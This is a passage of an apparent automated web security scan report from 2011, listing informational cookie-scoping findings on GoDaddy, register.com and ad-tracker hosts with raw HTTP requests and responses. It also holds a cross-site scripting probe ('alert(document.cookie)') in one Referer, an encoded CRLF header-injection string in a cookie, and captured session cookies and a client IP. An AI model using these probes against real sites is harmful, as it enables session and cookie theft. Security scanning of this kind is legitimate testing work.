Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97068


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https:/
...[SNIP]...

10.39. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:6422714091563403120 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/index.php?status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search&features_hash=P14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:23:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:23:54 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.40. http://img.godaddy.com/image.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.godaddy.com
Path:   /image.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB109&shopper=46215684&privatelabelid=1&status=200&rand=0.781776874690213&page=%2fssl%2fssl-certificates.aspx&split=24 HTTP/1.1
Host: img.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/03/2011 21:32:13&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:59; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pagecount=3; domain=.godaddy.com; path=/
Set-Cookie: fb_pagecount=3; path=/
Set-Cookie: actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
Set-Cookie: fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
Set-Cookie: app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
Set-Cookie: fb_session=S_TOUCH=09/03/2011 21:49:36&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
Set-Cookie: isc="; domain=.godaddy.com; path=/
Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:36 GMT; path=/
Set-Cookie: traffic=; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:49:36 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.41. http://img.godaddy.com/pageevents.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.godaddy.com
Path:   /pageevents.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pageevents.aspx?page_name=/ssl/ssl-certificates.aspx&ci=15014&eventtype=&ciimpressions=&usrin=&r=0.6363521805033088&comview=0 HTTP/1.1
Host: img.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/03/2011 21:32:13&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:59; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pagecount=15; domain=.godaddy.com; path=/
Set-Cookie: fb_pagecount=15; path=/
Set-Cookie: actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
Set-Cookie: fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
Set-Cookie: app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
Set-Cookie: fb_session=S_TOUCH=09/03/2011 21:49:49&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
Set-Cookie: isc="; domain=.godaddy.com; path=/
Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:50 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:49:50 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.42. http://m.adnxs.com/msftcookiehandler

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3d9FA60E9E25934DD3BB2BBC07F1AAFA23 HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21V.fsQSr=z6NGgptu>0_YXw_T%?9*a5p4!1-waB6<#uuy!Q#lx*XEB@`D:dkd7>T]xMWu7a9T1Y1.^NXLlK839uon7j94%gch60)-@(Z_[!1jn1vzCbx

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:38:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:38:27 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:38:27 GMT

GIF89a.............!.......,........@..L..;

10.43. https://mya.godaddy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.godaddy.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mya.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; adc1=US; currency1=potableSourceStr=USD; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=4f057259-4645-4223-96aa-98d6262a1c68; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:28:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=true&myaurl=%2fdefault.aspx
Set-Cookie: ShopperId1=mcjidfagdephnjweyclebfehyathlbaj; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:28:34 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 222

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&amp;redirect=true&amp;myaurl=%2fdefault.aspx">here</a>.<
...[SNIP]...

10.44. https://mya.godaddy.com/products/accountlist.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.godaddy.com
Path:   /products/accountlist.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products/accountlist.aspx HTTP/1.1
Host: mya.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:26:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=false&myaurl=%2fproducts%2faccountlist.aspx
Set-Cookie: ShopperId1=fhvekhlijizajdrfuatbuisjhckdhiwb; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:26:13 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 238

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&amp;redirect=false&amp;myaurl=%2fproducts%2faccountlist.
...[SNIP]...

10.45. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.register.com
Path:   /RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom? HTTP/1.1
Host: oascentral.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; mbox=check#true#1315085873|session#1315085812182-148030#1315087673|PC#1315085812182-148030.19#1317677814

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=Mhd7ak5indMAAU0C; expires=Tue, 03-Sep-13 21:36:19 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4620
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1456927453/Bottom/default/empty.gif/4d6
...[SNIP]...

10.46. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.register.com
Path:   /RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom? HTTP/1.1
Host: oascentral.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; mbox=session#1315085400638-452340#1315087347|PC#1315085400638-452340.19#1317677487|check#true#1315085547

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:30:51 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=Mhd7ak5inIsACxRd; expires=Tue, 03-Sep-13 21:30:51 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 11391
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<script language=javascript type=text/javascript> \n');
document.write ('<!-- -- START: POP TYPE CONTROLS -- --> \n');
docume
...[SNIP]...

10.47. http://pixel.adblade.com/imps.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.adblade.com
Path:   /imps.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imps.php?sgms=38 HTTP/1.1
Host: pixel.adblade.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: W3matter LLC | RevSense | http://www.w3matter.com
Set-Cookie: __sgs=9H1OEBpHJTWK0eUV1IWqNKX4KF4U8ibH6Zl%2FNq6xhhI%3D; expires=Sun, 02-Sep-2012 21:40:32 GMT; path=/; domain=.adblade.com
Content-type: image/gif;
Date: Sat, 03 Sep 2011 21:40:32 GMT
Server: lighttpd/1.4.21
Content-Length: 43

GIF89a.............!.......,...........D..;

10.48. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/img?mt_id=108043&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: uuid=4e394470-3e17-879f-6d77-411115d4b5ad; ts=1315061012; mt_mop=4:1313678521|10001:1312768945|10002:1313678517|13:1312375922

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f39 32569
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 03 Sep 2011 14:43:59 GMT
Location: http://loadm.exelator.com/load/?p=204&g=101&buid=4e394470-3e17-879f-6d77-411115d4b5ad&j=0
Connection: Keep-Alive
Set-Cookie: ts=1315061039; domain=.mathtag.com; path=/; expires=Sun, 02-Sep-2012 14:43:59 GMT
Set-Cookie: mt_mop=10008:1315061039|5:1315061038|10002:1313678517|4:1313678521|10001:1312768945; domain=.mathtag.com; path=/; expires=Mon, 03-Oct-2011 14:43:59 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.49. http://pixel.mathtag.com/event/js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/js?mt_id=108024&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: uuid=4e394470-3e17-879f-6d77-411115d4b5ad; ts=1313859917; mt_mop=4:1313678521|10001:1312768945|10002:1313678517|13:1312375922

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x79ea 31210
Cache-Control: no-cache
Content-Type: text/javascript
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 03 Sep 2011 14:43:33 GMT
Connection: Keep-Alive
Set-Cookie: ts=1315061013; domain=.mathtag.com; path=/; expires=Sun, 02-Sep-2012 14:43:33 GMT
Content-Length: 924

   /*
   http://pixel.mathtag.com/event/img?mt_id=108043&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3=
   http://ad.yieldmanager.com/pixel?id=1429123&id=725544&id=74894&id=547417&id=119282&t=2
   */

   var mm_ri = Strin
...[SNIP]...

10.50. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4940&nid=1994&put=vf1kj11kp2en&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rpb=7908%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:32:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C2%2C%2C; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1994=vf1kj11kp2en; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.51. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
